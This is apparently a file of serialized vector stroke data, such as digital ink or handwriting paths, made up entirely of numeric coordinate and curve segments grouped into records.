0 1,-1-1-1,1 1 0,0 0 0,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,-1 1 0,1-1 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 1,-1 1-1,1-1 0,1-4 52,0-1 0,1 1 0,-1 0 0,1 0 0,0 0 0,0-1 0,3-3 0,9-20 50,-5 3-109,1 1 1,1 0-1,1 0 0,1 1 0,0 1 0,2 1 1,1 0-1,1 0 0,0 2 0,2 0 1,0 1-1,1 1 0,0 1 0,39-23 1,-56 37 2,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0 0 0,0 1 0,-1-1 0,8 0 0,-10 1-9,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1-1,0 1 1,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1-1-1,-1 1 1,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0-1,0 1 1,-1 3 0,0 0-1,0-1 0,0 1 1,-1 0-1,0-1 1,0 0-1,0 1 0,-1-1 1,1 0-1,-1 0 1,0 0-1,0-1 0,-1 1 1,1-1-1,-1 0 0,1 0 1,-6 4-1,-11 8 0,-40 22 1,42-27-125,0-1 1,0-1 0,-39 13 0,6-15-2519,42-8 1950,7-8-4801,12-8-2656,-9 12 5109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8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 2100,'-20'-5'10020,"20"5"-9967,-1 0 0,1 0 0,0 0 0,0 1 1,0-1-1,-1 0 0,1 0 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 1,0 1-1,0-1 0,0 0 0,0 0 0,0 1 1,1-1-1,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 1,1 0-1,-1 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 1,0 0-1,1 0 0,-1 0 0,18 6-823,-17-6 125,5 0 715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59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4839 8 440,'-11'-7'6973,"11"7"-6827,0 1-1,0-1 0,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 0,0-1 0,1 1 1,-1-1-1,0 1 0,0-1 0,1 0 0,-1 1 1,0-1-1,0 1 0,1-1 0,-1 0 0,0 1 1,1-1-1,-1 0 0,1 1 0,-1-1 0,0 0 0,1 0 1,-1 1-1,1-1 0,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 1 0,-1-1 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1-1 1,1 1-1,-1 0 0,1 0 0,-1 0 0,0 0 1,1 0-1,-1-1 0,1 1 0,-1 0 0,4-4 3370,-4 5-3305,0 1-1,-1-1 0,1 0 0,-1 1 0,0-1 0,1 0 1,-1 0-1,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 1,0 0-1,-2 1 0,-13 15 257,15-15-424,-1 0 0,1 1 0,-1-1-1,0 0 1,0 0 0,0-1 0,0 1-1,0 0 1,0-1 0,0 1 0,-4 1-1,1-1 53,0 1 0,0-1-1,0 1 1,0 1 0,0-1-1,0 1 1,-6 6-1,-29 20 322,-89 43 590,45-19-347,-166 74 616,131-80-951,1 1 296,53-27-260,20-8-90,-67 17 609,43-13-509,-99 18 449,140-31-670,-33-1 338,48-4-320,0 1 0,0 0-1,-25 5 1,11-1-62,-1-1-1,1-1 1,-1-2-1,0-1 1,-28-3-1,-20 0-100,32 4 88,18 0 54,-1-1 1,-46-7-1,51 1-145,14 4 0,1 1 0,-1-1 0,1 1 0,-1 0 0,0 1 0,-12 0 0,-118-6 0,93 4 0,33 1 0,0 0 0,0 1 0,0 0 0,-14 3 0,16-2 0,0 0 0,0-1 0,0 0 0,-19-3 0,-22-1 0,-57-8 0,-41-6 0,7 24 0,131-7 0,0-3 0,-23-6 0,-1 1 0,0 2 0,-1 2 0,-50-2 0,77 8 0,-19-7 0,1-2 0,16 4 0,-5 0 0,0 1 0,0 1 0,-27-1 0,15 1 0,9-2 0,-1 0 0,0 2 0,0 0 0,0 2 0,0 0 0,0 1 0,0 1 0,-21 4 0,-61 4 0,-81-4 0,119 0 0,-76 0 0,129-6 0,0-1 0,0-1 0,0 0 0,-21-7 0,21 6 0,-96-20 0,42 10 0,-21-8 0,66 8 0,17 10 0,1 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,-6-1 0,4 1 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-6-5 0,-36-22 0,-16-2 0,61 27 0,2 4 0,-1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,-1-1 0,-9-5 0,3 0 0,1 1 0,0-2 0,1 1 0,0-1 0,-8-11 0,11 12 0,-1 1 0,1-1 0,-1 1 0,0 0 0,-1 0 0,0 0 0,0 1 0,0 0 0,-12-7 0,11 9 0,-3-7 0,6 5 0,0 0 0,-3 3 0,4-5 0,2 4 0,-2 3 0,3 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-2 0 0,-8-9 0,10 9 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-5-2 0,3-15 0,0 12 0,-5 5 0,-49-13-13379,54 11 12615,-1 1-1,0 0 0,0 0 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 1 0,0 0 0,-6 1 1,-5 0-1923,-17-1-1642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13 437 976,'-1'0'145,"1"0"1,-1 0-1,0-1 1,1 1-1,-1 0 1,0 0-1,1-1 0,-1 1 1,1-1-1,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1-1 1,-1 1-1,1-1 0,-1 0 1,1 1-1,0-1 1,-1 0-1,1 1 0,0-1 1,0 0-1,-1 1 1,1-1-1,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0 1 1,1-2-1,-1 0 183,0 1-1,0-1 0,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 1 0,-1 0 1,1-1-1,0 1 1,0 0-1,0-1 1,-1 1-1,3-2 0,-1 2 366,-2-9 1113,1-9 3012,7 10-4336,-7 9-449,-1-1 0,1 0 1,-1 0-1,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,-1-2 0,0 2-3,1-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,-1 1-1,0-1 1,1 1 0,0-2 0,0 1 9,0 0-1,1-1 0,-1 1 0,0 0 1,0-1-1,-1 1 0,1-1 0,0 1 1,-1-1-1,1 1 0,-1-1 1,0-3-1,8-27 199,-7 27-187,1 0 0,-1 0-1,0 0 1,-1-1 0,0 1 0,0 0-1,0 0 1,-2-11 0,1-7 204,11-7 247,-10 29-470,0 0 1,0 0 0,0 0-1,0 0 1,0 0 0,0-1-1,1 1 1,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0 1,0 1 0,0-1-1,2-3 1,-2 2 27,0 0 1,0 0 0,-1 1-1,1-1 1,-1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0-1,-1-2 1,0-6 285,1 10-204,2-29 1175,39 35-1115,8 5-70,0-3 0,0-1 0,1-3 0,62-4 0,-63 1-123,163-12 67,-190 9-76,-20 2-37,-1 1 0,1-1-1,0 1 1,-1 0 0,1 0-1,-1 0 1,1-1 0,0 1-1,-1 1 1,1-1 0,-1 0-1,1 0 1,0 1-1,-1-1 1,1 1 0,-1-1-1,3 2 1,-4-1-136,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,-1-1-1,1 1 1,0 0-1,-1 0 0,1 0 1,-1 0-1,1 0 0,-1-1 1,1 1-1,-1 0 1,0-1-1,1 1 0,-1 0 1,0-1-1,1 1 1,-2 0-1,-18 17-5372,-2-6-2620,12-11 3772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3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 48,'0'6'15243,"-9"0"-14026,10-6-1195,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0-1 0,1 1-1,-1 0 1,0 0 0,1 0 0,-1-1-1,0 1 1,0 0 0,1 0 0,-1-1-1,0 1 1,0 0 0,1-1 0,-1 1-1,0 0 1,0-1 0,0 1 0,0 0-1,1-1 1,-1 1 0,0 0 0,0-1-1,0 1 1,0 0 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0 0,0-1-1,0 1 1,0 0 0,0-1 0,-1 0 262,25-16-189,-17 16-99,13-4-4,-18 4 8,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0-1,1 0 1,1 1 0,10-1 14,-8-1-15,0 1-1,-1 0 1,1 0 0,0 0 0,0 1 0,0 0-1,0 0 1,5 2 0,20 4 11,-30-7-12,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 1-1,-1-1 1,0 0-1,1 1 1,-1-1-1,0 1 1,1 0-1,-1-1 1,0 1-1,2 1 1,5 7-42,-8-9 42,1 0 1,0 1-1,0-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 1 0,-1 7 11,-1 0 0,0 0 0,0 0 0,-1 0 0,0-1 0,-1 1 0,0-1 0,0 0 0,-6 8 0,-10 24 20,11-27-20,8-12-9,0 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 1-1,1-1 1,-1 0-1,0 0 1,1 1 0,-1-1-1,1 1 1,0-1-1,-1 0 1,1 1-1,0 1 1,-11 59 42,11-56-39,1 0 0,0 0 1,0 1-1,1-1 1,0 0-1,0 0 0,0-1 1,1 1-1,-1 0 0,1-1 1,1 1-1,-1-1 1,5 5-1,11 12-11,36 33 1,-36-38 68,-2 0 0,22 28 0,-36-42-15,-1 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0-1,-1-1 1,0 1 0,0 0 0,0 0-1,0 0 1,0 0 0,-1 0 0,0 0-1,0 0 1,0 0 0,-1 5 0,0-5-4,0-1 0,0 0 0,-1 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-5 2 0,-15 3-20,0 0 0,0-1 0,-38 3 0,-10 2-327,67-10 173,0 0 0,-1 0-1,1-1 1,0 1 0,0-1 0,0 0 0,0 0-1,0 0 1,-6-3 0,8 3-297,0 0 0,0 1-1,0-1 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 0-1,-1-2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4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1236,'0'0'1844,"0"-7"-568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5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12 784,'2'-12'9712,"-1"12"-9518,1 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 1-1,1-1 1,-1 1 0,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1 0,0 0-1,1 0 1,-1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 1-1,0-1 1,0 0 0,-1 1-1,1-1 1,0 0-1,-1 1 1,1 1 0,9 52 699,-4-15-534,-4-30-254,0 0 0,-1 0 0,0 0 1,-1 1-1,-1 16 0,0-18-25,0 0 0,1 0 1,0 1-1,1-1 0,0 0 0,5 17 1,-5-21-50,0 1 1,0-1 0,0 0 0,-1 1-1,0-1 1,-1 11 0,1-12-20,-1 0-1,1 0 1,0 0-1,0 0 1,1 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,2 5 0,-2-8-18,0 0 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,0 0 0,1 1 1,-1-1-1,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 1,-1 0-1,1 1 0,0-1 0,-1 0 0,1 0 1,-2 2-1,2-2-99,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0-1 0,-1 0 0,-30-12-9488,21 2 6145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6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0 206 504,'1'-4'437,"0"-1"-1,1 1 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,1 0 1,0 0-1,-1 1 1,7-7 0,35-36 1881,-34 36-2074,0 0-1,0 1 1,1 0 0,1 1 0,0 0 0,0 1 0,0 0 0,1 1-1,0 0 1,0 1 0,0 0 0,1 2 0,-1-1 0,1 1 0,21-1-1,-32 5-197,1-1-1,-1 1 0,0-1 1,1 1-1,-1 0 1,0 1-1,0-1 0,0 0 1,0 1-1,0 0 0,0-1 1,-1 1-1,1 0 0,0 1 1,-1-1-1,0 0 0,1 1 1,-1-1-1,0 1 1,0 0-1,-1 0 0,1 0 1,0 0-1,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 1-1,-1-1 0,1 0 1,-1 1-1,0-1 0,0 0 1,0 1-1,0-1 1,-1 0-1,1 1 0,-1-1 1,-1 4-1,-6 11 426,4-8-232,0 0 0,-1 0 0,1-1 0,-2 0 0,0 0 0,-11 14 0,-16 15 400,27-29-504,-1-1-1,0-1 0,0 1 1,-9 6-1,-3 1 132,16-11-189,-1-1 0,0 0 0,0 0 0,0 0 1,0-1-1,-1 1 0,1-1 0,-1 0 0,-5 2 0,-5 0 289,-24 3 477,52-20-1856,-4 8-125,1 0-1,1 1 0,-1 0 0,1 1 1,-1 0-1,1 1 0,0 0 0,11 0 0,-7 0 388,11-2-1,-26 3 764,0 1 1,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1 0-1,0 1 1,1-1 0,-1 0 0,1 0-1,-1 0 1,0 1 0,1-1 0,-1 0-1,0 0 1,1 1 0,-1-1 0,0 0-1,1 1 1,-1-1 0,0 1 0,0-1-1,1 0 1,-1 1 0,0-1 0,0 1-1,45 22 5063,-11-6-3190,-24-14-1540,-1 2 0,0-1 1,0 1-1,15 12 0,30 23 386,-39-26-646,-12-11-82,-1-1 0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 0 0,1-1 0,-1 1 0,7 0 0,18 2 153,-20-2-3773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32 103 1332,'0'0'1432,"-9"5"1468,13-4-2583,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0-1 0,1 0 0,-1 0 0,0-1 0,8-1 0,41-10 617,-46 11-718,0-1 0,0 1 0,0-2-1,0 1 1,-1-1 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 0 0,0 0 0,-1-1 0,7-7 0,-11 12-169,-1-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,-1-1-1,1 0 1,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,0-1 0,-4-5 471,5 5-490,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 1 1,-1-1-1,0 0 1,1 0-1,-1 0 1,0 0-1,1 1 1,-1-1-1,0 0 0,0 1 1,0-1-1,0 1 1,1-1-1,-1 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0 0 0,-1 1 1,1-1-1,0 0 1,0 0-1,0 0 1,-1 1-1,-43 9 314,33-4-228,-1 1 1,1 0-1,1 1 1,-1 0-1,1 1 1,1 0-1,0 0 1,-15 19 0,22-25-94,1 1 1,-1-1 0,1 1 0,1-1 0,-1 1-1,0 0 1,1 0 0,0-1 0,0 1 0,0 0-1,0 0 1,0 0 0,1 1 0,0-1 0,0 0-1,0 0 1,0 0 0,1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,1-1 0,2 5-1,-1-2 0,0-1-1,0 0 1,1 0 0,0 0-1,0 0 1,0-1-1,1 1 1,-1-1-1,1 0 1,0 0 0,1-1-1,-1 0 1,0 0-1,1 0 1,0 0-1,8 2 1,0-1-27,0 0 0,0-1-1,0 0 1,1-1 0,-1-1 0,16 0 0,-20-1-534,-1-1 0,1 0 0,0 0 1,0-1-1,16-5 0,-20 4-608,0 0 0,0-1 1,0 1-1,-1-1 0,0 0 0,1-1 0,-1 1 0,6-9 0,0 1-2101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 1092,'0'0'1578,"-19"-6"8693,20 7-10170,0-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1-1,0 1 1,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 2-1,7 42 589,-2-10-551,-3-28-116,0 0 0,-1 1 0,0-1 0,0 0 0,-1 13 0,4 28 42,18 62 22,-1-8-69,-18-96-15,-1 1 1,0-1-1,0 1 1,-1 0-1,0 0 1,0 0-1,0 7 1,5-7-34,-3-3-65,-10-3 23,-8-26-1689,12 19 1536,-1 1 0,0 0 0,0-1 0,-1 1 1,1 1-1,-1-1 0,-8-5 0,3 2 161,6 4 37,-56-40 206,39 34 176,18 9-172,-1-1 0,1 1-1,0-1 1,0 0 0,0 0 0,0 0 0,0-1 0,-4-2-1,-4-5 1190,6 3-516,32 6-668,39 4-361,-4 0-3149,1-8-6106,-51 4 6281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48,'-1'0'169,"0"0"0,1 0 0,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 1,-1 0-1,1 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,-1 1 1,1-1-1,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 1,0 1-1,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 0,0 0 0,8 31 1260,-3-13-499,-4-9-704,2-1 0,-1 1 0,1-1 0,1 0 0,9 18 0,-5-10-80,-2-3-25,-4-11-87,0 1 1,0-1 0,-1 1-1,1 0 1,-1-1 0,0 1-1,0 0 1,0 6-1,-1-9 350,1-7-104,-1 0 0,0 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,-2-6 0,-6-49 285,8 56-525,2 0 1,-1 0 0,0 0 0,1 0-1,0-1 1,0 1 0,1 0-1,-1 0 1,1 0 0,0 0 0,1 0-1,-1 0 1,4-7 0,0-1 36,-5 12-82,0 1-1,1-1 1,-1 0-1,0 1 1,0-1-1,0 1 1,1-1-1,-1 0 1,0 1-1,1-1 1,-1 1-1,0-1 1,1 1-1,-1-1 1,1 1-1,-1 0 1,1-1-1,-1 1 1,1-1-1,-1 1 1,1 0-1,-1 0 1,1-1-1,0 1 1,-1 0-1,1 0 1,-1-1 0,1 1-1,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,0 0 1,-1 1-1,2-1 1,41 0-1705,-27 0-1242,0 0-3327,-7 0 3571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1 868,'0'0'136,"0"1"0,0-1-1,0 1 1,0-1 0,0 0 0,0 1-1,0-1 1,-1 1 0,1-1 0,0 1-1,0-1 1,-1 0 0,1 1 0,0-1 0,-1 0-1,1 1 1,0-1 0,-1 0 0,1 1-1,0-1 1,-1 0 0,1 0 0,-1 1-1,1-1 1,-1 0 0,1 0 0,0 0-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1-1-1,-1 1 1,1 0 0,0 0 0,-1-1-1,1 1 1,-1 0 0,1 0 0,0-1 0,-1 1-1,1 0 1,0-1 0,0 1 0,-1-1-1,1 1 1,0 0 0,0-1 0,0 1-1,-1-1 1,1 1 0,0-1 0,0 1-1,0-1 642,21 32 1764,-20-28-2454,-1 0 0,1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 1,1 0-1,1 2 0,7 22 204,1 15-152,-10-38-222,0-1-1,0 1 1,1-1 0,-1 1-1,1-1 1,0 0 0,0 0-1,0 0 1,4 3 0,-5 5-1325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32 1104,'-8'-24'7777,"6"16"-5111,10 16-1615,-6-5-1181,0-1-1,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 4 0,0-4-358,-1 0 0,1 0 1,0 0-1,0-1 0,0 1 0,0 0 1,0-1-1,1 1 0,-1-1 0,1 1 1,0-1-1,0 0 0,2 3 0,7 2-2237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39 114 88,'5'-1'621,"1"1"0,-1-1 1,1 0-1,-1-1 0,0 1 0,0-1 0,10-5 0,-6 3-453,-1-1 0,0 0 0,0 0 0,0-1 0,0 0 0,7-9 0,-5 7-39,2-4 560,-12 12-668,0 0 1,0-1-1,0 1 1,0 0-1,0-1 0,0 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,0 0 0,-1-1 1,1 1-1,0 0 1,0-1-1,0 1 1,0 0-1,-1-1 0,1 1 1,0 0-1,0-1 1,-1 1-1,1 0 1,0 0-1,-1-1 1,1 1-1,0 0 0,-1 0 1,1-1-1,0 1 1,-1 0-1,1 0 1,-1 0-1,-11-7 822,11 5-696,-1 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,-3 1 0,-20 9 1503,22-10-1563,0 0-1,0 0 1,0 0-1,0 1 0,1 0 1,-1-1-1,0 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 1-1,0-1 0,0 1 1,-2 3-1,-5 8 106,6-11-163,1 0-1,0 0 0,0 1 0,0-1 0,0 1 0,0 0 1,1-1-1,-1 1 0,1 0 0,0 0 0,1 0 0,-2 5 0,-1 11 51,2-18-74,1-1-1,0 0 0,-1 1 1,1-1-1,0 0 1,0 1-1,-1-1 0,1 0 1,0 1-1,1-1 0,-1 1 1,0-1-1,0 0 1,1 1-1,-1-1 0,0 0 1,1 1-1,1 1 0,1 13 38,-3-15-39,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,1 0 0,11 10 55,39 28 68,-46-36-294,0 0 0,1 0 0,-1-1 0,1 0 0,0 0 0,0 0 0,0-1 0,13 1-1,18-8-3751,-35 5 3170,0 0 0,0-1 0,0 1-1,-1-1 1,1 1 0,0-1-1,-1 0 1,1 0 0,3-4-1,3 0-1627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24 428,'2'1'6430,"7"5"-5233,-8 3-896,1 0 0,0-1 0,0 1 0,1-1 0,5 13 0,4 11 60,-2-6-59,-8-20-229,1 1 0,-1-1 0,0 1 0,0-1 0,-1 1 0,1 6 0,-2-11-59,0 0 1,0 0-1,1-1 0,-1 1 1,1 0-1,-1 0 1,1-1-1,0 1 0,0 0 1,0-1-1,0 1 0,0-1 1,2 3-1,-2-2-8,0-1 1,0 0-1,0 0 0,0 1 1,0-1-1,0 1 0,-1-1 1,1 0-1,-1 1 0,1-1 0,-1 1 1,1 0-1,-1 2 0,0-4 62,0 1 1,0-1-1,0 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 1 1,1-1-1,-1 1 0,0-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 1 1,1-1-1,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 1,-1 0-1,1 1 0,0-1 0,22-50 1640,-11 17-1260,-2 2-108,2 0-1,30-56 1,-22 65-2246,-8 14-7785,-3 3 6709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0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18 170 108,'13'-4'4428,"17"-5"-2357,-10 2-1751,-1-1 0,0 0 0,-1-2 0,1 0 0,-2-1 0,0-1 0,27-23 0,-43 34-272,1 0 0,-1 0-1,0-1 1,1 1 0,-1 0 0,0-1 0,0 1 0,0-1-1,0 1 1,0-1 0,0 1 0,-1-1 0,1 0 0,0 1-1,-1-1 1,0 0 0,1-1 0,-1 2 71,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0-1,0 1 1,-1-2 0,0 1 4,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,0 0 0,0-1 0,-1 1 0,1 0-1,0 0 1,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0-1,1 0 1,-1 0 0,0 1 0,-3 1 0,-60 38 744,11-9-461,49-28-343,-1 0 1,0 0-1,1 1 1,0 0-1,0 0 0,0 0 1,1 0-1,-8 13 1,11-15-50,-1 0 1,1 0 0,0 0 0,0 1 0,0-1-1,1 1 1,-1-1 0,1 1 0,0-1 0,0 1-1,0-1 1,1 0 0,-1 1 0,1-1 0,-1 1-1,1-1 1,0 0 0,1 1 0,1 4 0,-1-6-21,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0-1-1,1 0 0,-1 1 1,1-1-1,4 2 1,39 12-153,-42-14 138,5 1-326,1 0 0,0-1 0,0 0 0,0-1 0,-1 0-1,1 0 1,0-1 0,10-2 0,74-22-8394,-71 18 5519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0 424,'0'14'9075,"9"39"-5855,23 112 1001,-28-148-4043,-1 1 1,0 0 0,-2 1-1,0 18 1,10 28-42,-6-47-118,-4-16-13,0 0 1,0 0-1,-1 0 0,1 1 1,0-1-1,-1 1 0,1-1 1,-1 0-1,0 1 1,0 4-1,0-6-32,-2-31-7025,-9 5 899,2 13 2918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1 168 836,'2'-11'1108,"1"0"-1,1 0 0,0 1 1,0-1-1,1 1 1,1 0-1,9-14 1,-11 18-802,1 1 0,0-1 1,0 1-1,1 0 1,0 0-1,0 0 1,0 1-1,0 0 1,1 0-1,-1 1 1,1 0-1,0 0 0,0 0 1,0 1-1,0 0 1,1 1-1,-1-1 1,0 1-1,8 0 1,-8 1-257,0 0 1,0 1 0,0-1 0,-1 1 0,1 1 0,0-1-1,-1 1 1,1 0 0,-1 1 0,1-1 0,-1 1 0,0 0-1,0 1 1,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,-1 0-1,8 9 1,-7-7-50,0-1 0,-1 1 0,1 0 0,-2 0 0,1 1 0,4 14 0,-7-18 23,-1 0-1,1 1 0,-1-1 0,0 0 0,-1 1 0,1-1 1,-1 1-1,0-1 0,0 0 